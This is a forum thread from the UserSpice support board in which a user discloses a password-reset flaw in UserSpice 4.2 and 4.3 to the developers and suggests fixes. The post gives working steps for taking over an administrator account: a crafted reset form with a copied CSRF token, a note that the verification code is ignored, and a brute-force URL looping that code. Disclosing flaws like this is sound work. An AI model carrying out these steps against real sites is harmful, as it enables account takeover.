The following warnings occurred:
Warning [2] Undefined variable $unreadreports - Line: 26 - File: global.php(961) : eval()'d code PHP 8.2.25 (Linux)
File Line Function
/global.php(961) : eval()'d code 26 errorHandler->error
/global.php 961 eval
/showthread.php 28 require_once





× This forum is read only. As of July 23, 2019, the UserSpice forums have been closed. To receive support, please join our Discord by clicking here. Thank you!

  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
danger: us4.2, us4.3 hackable easly
#1
I was testing email verification on my server, and found that userspice system can be easly hacked by knowing ONLY e-mail.
Just tested on lattest 4.3 beta. Any user that knows userspice code or any foreign hacker may easly hack system with just simply revealing hidden form on:
Code:
http://localhost/us43/users/forgot_password_reset.php
(you can get form code from userspice files or just register a legit user and reset password to copy it)

So insert form code:
<div class="row">
<div class="col-xs-12">
<h2 class="text-center">Hello <?=$ruser->data()->fname;?>,</h2>
<p class="text-center">Please reset your password.</p>
<form action="forgot_password_reset.php?reset=1" method="post">
<?php if(!$errors=='') {?><div class="alert alert-danger"><?=display_errors($errors);?></div><?php } ?>
<div class="form-group">
<label for="password">New Password:</label>
<input type="password" name="password" value="" id="password" class="form-control">
</div>
<div class="form-group">
<label for="confirm">Confirm Password:</label>
<input type="password" name="confirm" value="" id="confirm" class="form-control">
</div>
<input type="hidden" name="csrf" value="d6ce184598d13738a7d4a86a562cc8fe">
<input type="hidden" name="email" value="userspicephp@gmail.com">
<input type="hidden" name="vericode" value="">
<input type="submit" name="resetPassword" value="Reset" class="btn btn-primary">
</form>
<br />

fill data in form:
<input type="hidden" name="csrf" value="d6ce184598d13738a7d4a86a562cc8fe"> - get this on registration page
<input type="hidden" name="email" value="userspicephp@gmail.com"> - default e-mail, if you know admin e-mail, thats it
<input type="hidden" name="vericode" value=""> - VERICODE IGNORED
<input type="submit" name="resetPassword" value="Reset" class="btn btn-primary">

- now you can use this form to reset administrator's password.
1) csrf token is useless in this case and can be copied from registration page
2) Vericode is completely ignored - add check!
3) Vericode is extremely short and unsecure! - this means even if you add vericode check for this form it still will be easly hackable with script! (you will need less than 1 second to guess vericode with bruteforce) and than it's done

you just need to setup this url:
Code:
http://localhost/users/forgot_password_reset.php?email=userspicephp{3bc1fe685386cc4c3ab89a3f76566d8931e181ad17f08aed9ad73b30bf28114d}40gmail.com&vericode=<strong>0</strong>&reset=1
and loop vericode from 0 to 999999

My suggestions:
vericode should be like a token, make it LONG
That's how i craft my vericode (example):
<pre>
Code:
public static function getVericode(){
        return bin2hex(random_bytes(32));
    }
</pre>

Make sure you generate new vericode on every action like:
password reset, verify email, user creation etc

so new solid verycode before every action, so on password reset you generate NEW vericode, store it in db and send it - that should be done when user press "reset" button

This marks that you do not check userinput data. Keep in mind that user can put everything they want into html page, they can also craft any POST and GET request. Just need add solid validation to php.

Thanks!
  Reply


Messages In This Thread
danger: us4.2, us4.3 hackable easly - by SavageStyle - 11-05-2017, 02:50 PM
danger: us4.2, us4.3 hackable easly - by Brandin - 11-05-2017, 06:21 PM
danger: us4.2, us4.3 hackable easly - by mudmin - 11-06-2017, 01:12 PM
danger: us4.2, us4.3 hackable easly - by mudmin - 11-12-2017, 12:59 PM

Forum Jump:


Users browsing this thread: 2 Guest(s)